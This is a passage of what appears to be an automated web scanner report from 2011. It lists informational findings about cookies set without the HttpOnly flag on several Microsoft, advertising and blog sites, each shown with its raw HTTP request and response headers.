Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
7.12. http://segments.adap.tv/data/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /data/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /data/?p=lotame&type=gif&audid=2723&add=true HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rtbData0="key=turn:value=4325897289836481830:expiresAt=Mon+Jul+04+18%3A51%3A56+PDT+2011:32-Compatible=true"; adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-06-30+05%3A43%3A39"; audienceData="{\"v\":2,\"providers\":{\"31\":{\"f\":1311490800,\"e\":1311490800,\"s\":[1953,1952,1950,1966,1949,1960,1947,1962],\"a\":[]},\"9\":{\"f\":1312009200,\"e\":1312009200,\"s\":[1508,528,525],\"a\":[]},\"25\":{\"f\":1310886000,\"e\":1310886000,\"s\":[1996],\"a\":[]},\"8\":{\"f\":1311058800,\"e\":1311058800,\"s\":[1672],\"a\":[]},\"28\":{\"f\":1310886000,\"e\":1339830000,\"s\":[1802],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
p3p: CP="DEM"
Cache-Control: no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-07-06+04%3A21%3A53";Path=/;Domain=.adap.tv;Expires=Sat, 14-Mar-2043 13:08:33 GMT
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"7\":{\"f\":1312527600,\"e\":1312527600,\"s\":[1512],\"a\":[]},\"31\":{\"f\":1311490800,\"e\":1311490800,\"s\":[1953,1952,1950,1949,1966,1947,1960,1962],\"a\":[]},\"9\":{\"f\":1312009200,\"e\":1312009200,\"s\":[1508,528,525],\"a\":[]},\"25\":{\"f\":1310886000,\"e\":1310886000,\"s\":[1996],\"a\":[]},\"8\":{\"f\":1311058800,\"e\":1311058800,\"s\":[1672],\"a\":[]},\"28\":{\"f\":1310886000,\"e\":1339830000,\"s\":[1802],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Sat, 14-Mar-2043 13:08:33 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;
7.13. https://signup.live.com/signup.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://signup.live.com
Path:   /signup.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup.aspx HTTP/1.1
Host: signup.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&checkda=1&ct=1309961190&rver=6.1.6206.0&wp=MBI_SSL&wreply=https:%2F%2Fsignup.live.com%2Fsignup.aspx&lc=1033&id=68692
Server: Microsoft-IIS/7.0
Set-Cookie: RPSMaybe=1309961490; domain=signup.live.com; path=/; secure
X-Powered-By: ASP.NET
P3P: BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Wed, 06 Jul 2011 14:06:30 GMT
Connection: close
Content-Length: 321

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;checkda=1&amp;ct=1309961190&amp;rver=6.1.6206.0&amp;w
...[SNIP]...
7.14. http://social.zune.net/frag/MediaReviewBlock/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /frag/MediaReviewBlock/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /frag/MediaReviewBlock/ HTTP/1.1
Host: social.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
eid: 19ef6009-477e-4f49-b318-45f21f3e4179,857440
X-AspNet-Version: 2.0.50727
lx-svr: S803
X-Powered-By: ASP.NET
Expires: Wed, 06 Jul 2011 14:06:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:06:46 GMT
Content-Length: 4716
Connection: close
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:36:46 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/

<h2 style=""></h2>
<div id="ajaxErr"></div>
<input type="hidden" id="_comments_hidDelete" /><div class="Pivot"> <a href="#" onclick="ajaxLoader('','&#47;frag&#47;MediaReviewBlock&#47;&#63;_saveRe
...[SNIP]...
7.15. http://social.zune.net/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /search.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search.aspx HTTP/1.1
Host: social.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
eid: 19ef6009-477e-4f49-b318-45f21f3e4179,857422
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
lx-svr: S803
X-Powered-By: ASP.NET
Expires: Wed, 06 Jul 2011 14:06:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:06:38 GMT
Content-Length: 24089
Connection: close
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:36:36 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:38 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...
7.16. http://social.zune.net/zPage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /zPage.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /zPage.aspx HTTP/1.1
Host: social.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
lx-svr: S805
X-Powered-By: ASP.NET
Content-Length: 13509
Expires: Wed, 06 Jul 2011 14:06:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:06:50 GMT
Connection: close
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:49 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
7.17. http://spaces.live.com/BlogIt.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spaces.live.com
Path:   /BlogIt.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BlogIt.aspx HTTP/1.1
Host: spaces.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Imf: ede387e6-6b9a-47e4-9826-4e6371654e4e
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 12:26:46 GMT; path=/
Set-Cookie: E=P:vQlOE/0Jzog=:M8dpwUFUPyf3AwZ60baR4PtyqHIUw3ChkgmFA7LS9ZU=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 12:26:46 GMT; path=/
Set-Cookie: E=P:vQlOE/0Jzog=:M8dpwUFUPyf3AwZ60baR4PtyqHIUw3ChkgmFA7LS9ZU=:F; domain=.live.com; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 13-Jul-2011 14:06:46 GMT; path=/
Set-Cookie: sc_lpscache_142=; domain=spaces.live.com; path=/
Set-Cookie: sc_clustbl_142=08660009c693a889; domain=spaces.live.com; expires=Fri, 05-Aug-2011 14:06:46 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: SN2XXXXXC564 V: 1 D: 6/27/2011
Date: Wed, 06 Jul 2011 14:06:45 GMT
Connection: close
Content-Length: 2330


<html>
<head>
<noscript><meta http-equiv="refresh" content="2;url=https&#58;//login.live.com/login.srf&#63;wa&#61;wsignin1.0&#38;rpsnv&#61;11&#38;ct&#61;1309961206&#38;rver&#61;6.1.620
...[SNIP]...
7.18. http://va.px.invitemedia.com/goog_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /goog_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goog_imp?returnType=image&key=AdImp&cost=ThRFQQAEG8YK5TlPHdsIpCfKn676XEjdI1IuFw&creativeID=124070&message=eJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1d0i0ts0JCfAI6XYs8DR1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgC0CRj.&managed=false HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMwM119; dp_rec="{\"1\": 1308705141+ \"3\": 1308705126+ \"2\": 1308705121+ \"4\": 1305981633}"; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"702131\": [1309234818+ \"6711271471285110655\"+ 160677+ 103577+ 2]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"678237\": [1309235299+ \"6199351355498244314\"+ 4483+ 2534+ 2]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"690770\": [1308836704+ \"TgNDVQABeU4K7F4GcysJsg==\"+ 63083+ 25140+ 4515]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"584205\": [1309235459+ \"4153838206207653460\"+ 160819+ 103586+ 2]+ \"642979\": [1309224535+ \"2550584914158478617\"+ 162013+ 105345+ 2]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuGYuIxVgFGiedPSDywKjBrND/d/YDFgtADzuWQ43k5kE+CQeLwBIvt6H5A2YLfYc2sJWHbWDDag3qa1ENmm7ltgvWA+UHbuY5DJ1+8sActef7ETLAvmc4lw3F8M0vugrRcoy6DBYMBgwQAUXTEfpOdbUyuK6Jr/TAJMEs/QRHsXgExoOfv0PbLo64kg0YMPr6OITn4PMvdCw2YU0d8LQaJz0UTvvmQBis740IAiuhPosiyJT++RRUU5Zv5gEWhlllh0GlV411cWgYmMEueW/3+HLDwLaMY1RokrL/+9Qzb67AtWAWaJfU/voYh+fAV23K4LKKKzNoJEb30/iBAFAO4yhgc="; io_freq_p1="eJzjEuboCxNglGjetPQDiwGjBZjmEudYEi/AKfF4A5CjwKDBYMBusefWErDEy3ig6qa1MAlGCzAbKHEnAihx/c4SuASYzSXMcTABKPGgrRcqwWDBwCXCsS1U4CCTxLemViRRYY4fNgJMEs/QBJeB9LecffoeWfBxDFDwQsNmFMELoUDBuWiCTwOAgjM+NLxHtv5HoEArs8Si06iitwIFJjJKnFv+/x2yAZtjBJgl9j29hyJ4FGT/3F0XUAS7w4GCt74fRAgCACVJYIc="; segments_p1="eJwtUU1LAlEUJWcWr7ean9IP6Ce0r7W7Nv6GTFwkzcZokZUxWQRR6oxCH5KbxK9BclGUWkKghpHQEDSBpr1zaHM4nHvPPffdJ3XhFTSpi+0csPETUNidzCl8u4IyaEOJ94GjXkBq4jwk54UVNE4usp6uVJeeSg9oVtAxXVY0T2OZow4n4HsjcOcGfJ/KcRgRZT+gJqaCxvX/xI8xii1l1URNKKjAeHqH5icftTq3rTKzZiIzvCKlKNmakbYSvq6EbAh7D9DRMIGJLUyp0eMOwb1PYHFM5CuSHnh+Br7OjGfm7bD67UB5HyNvtqToZh/UWlT0ls5WEx0u85p0ZnmG+wyqLrOtR+CQb+yw54gblGLw+r/gKZ4nMgW/TANfO1AeHPAkL1HlfpEZVrAFtsmhuKZkKTpR3XiZRHnOPMfbHmOLwH6O16ceLwC/+LW7C/hD3szk9NEB5JSh6Bm72z6E2KqimSb+Z4rk7ob2B83Zo/U="; partnerUID=eyIxMTUiOiBbIjRkY2U4YTUzMDUwOGIwMmQiLCB0cnVlXSwgIjE5MSI6IFsiODQ5NjUzMDYzOTI1MzI1NTgwNiIsIHRydWVdLCAiMTUiOiBbIjAwNDAwMzAwMTQwMDAwMDQ0OTg3MiIsIHRydWVdLCAiODQiOiBbIkZ6NitFUy9jOTlPNno1T0IiLCB0cnVlXSwgIjExMyI6IFsiRlFXV0MyVksyRFdGIiwgdHJ1ZV19

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 06 Jul 2011 11:21:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 06-Jul-2011 11:21:20 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Thu, 05-Jul-2012 11:21:40 GMT; Path=/
Set-Cookie: impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"678237\": [1309235299+ \"6199351355498244314\"+ 4483+ 2534+ 2]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"690770\": [1309951300+ \"ThRFQQAEG8YK5TlPHdsIpA==\"+ 63083+ 25140+ 6119]+ \"702131\": [1309234818+ \"6711271471285110655\"+ 160677+ 103577+ 2]+ \"584205\": [1309235459+ \"4153838206207653460\"+ 160819+ 103586+ 2]+ \"642979\": [1309224535+ \"2550584914158478617\"+ 162013+ 105345+ 2]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; Domain=invitemedia.com; expires=Thu, 05-Jul-2012 11:21:40 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuG4v5hNgEniSNfFDywKjBpnZgBpA0YLMJ9LhGPiMlYBRonmTUuBsgwaDAYMFgxA0bcT2QQ4JB5vQBaV4Jg1gw2otmntUrBJTd23gCZB1M99DDLl+p0lKKasmA8S/dbUiiK65j8T0D3P0ER7F4DMbjn79D2y6OuJINGDD6+jiE5+DzL3QsNmFNHfC0Gic9FE775kAYrO+NCAIroT6LIsiU/vkUVFOWb+YBFoZZZYdBpVeNdXFoGJjBLnlv9/hyw8C2jGNUaJKy//vUM2+uwLVgFmiX1P76GIfnwFdtyuCyiiszaCRG99P4gQBQCc9nZ9"; Domain=invitemedia.com; expires=Thu, 05-Jul-2012 11:21:40 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjkuY4mCDAJHGk6+IHFgVGjSNrr31gMWC0APO5hDn6wgQYJZo3LQVKMmgwGDBYMAAFl8QLcEo83oAq+DIeqLJpLargnQig4PU7S5AERTi2hQocZJL41tSKovSHDdAZz9AElyUA9becffoeWfBxDFDwQsNmFMELoUDBuWiCTwOAgjM+NLxHtv5HoEArs8Si06iitwIFJjJKnFv+/x2yAZtjBJgl9j29hyJ4FGT/3F0XUAS7w4GCt74fRAgCADwQWy8="; Domain=invitemedia.com; expires=Thu, 05-Jul-2012 11:21:40 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
7.19. https://wordpress.com/wp-login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wordpress.com
Path:   /wp-login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-login.php HTTP/1.1
Host: wordpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Jul 2011 11:21:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: hiab=on; path=/; domain=.wordpress.com
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; domain=.wordpress.com
Content-Length: 3666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <meta
...[SNIP]...
7.20. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?q=presspass%20controls&FORM=MSSBMN HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:19:45 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Date: Wed, 06 Jul 2011 11:20:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=E9BAB4C7FF984C72A2A7D8BEAEA22874; domain=.bing.com; path=/
Set-Cookie: MUID=067CC8A94F2C44DCA6EE1FBCBC8D44CF; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=067CC8A94F2C44DCA6EE1FBCBC8D44CF%2c10716aee572d4952b36b2971f6480e26; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1846760&MS=1846760&AF=MSSBMN; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=18047B6C75F646499C286F39250DB552; expires=Fri, 05-Jul-2013 11:20:45 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110706; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Content-Length: 35959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
7.21. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 148
Content-Type: text/html; charset=utf-8
Location: /?scope=web&mkt=en-US
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Wed, 06 Jul 2011 11:20:45 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1309951245; domain=.bing.com; path=/
Set-Cookie: _SS=SID=2FDEEE3741EE47F7B94DEA42819A0D90; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1846760&MS=1846760&AF=NOFORM; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=026636356BC841D79F1AE4DB11B04388; expires=Fri, 05-Jul-2013 11:20:45 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110706; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f%3fscope%3dweb%26mkt%3den-US">here</a>.</h2>
</body></html>
7.22. http://www.burstnet.com/enlightn/7111//82F1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/7111//82F1/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/7111//82F1/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; TID=16vda0204fei8g; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^1AF.1GB1^15X.1F0r^16U.1F0r^186.1DzU^1As.1EWG^13V.1EXA

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Wed, 06 Jul 2011 14:00:51 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^1AF.1GB1^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EXA^13v.1EZU; path=/; expires=Fri, 06-Jul-2012 14:00:51 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;
7.23. http://www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cadence.com
Path:   /Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

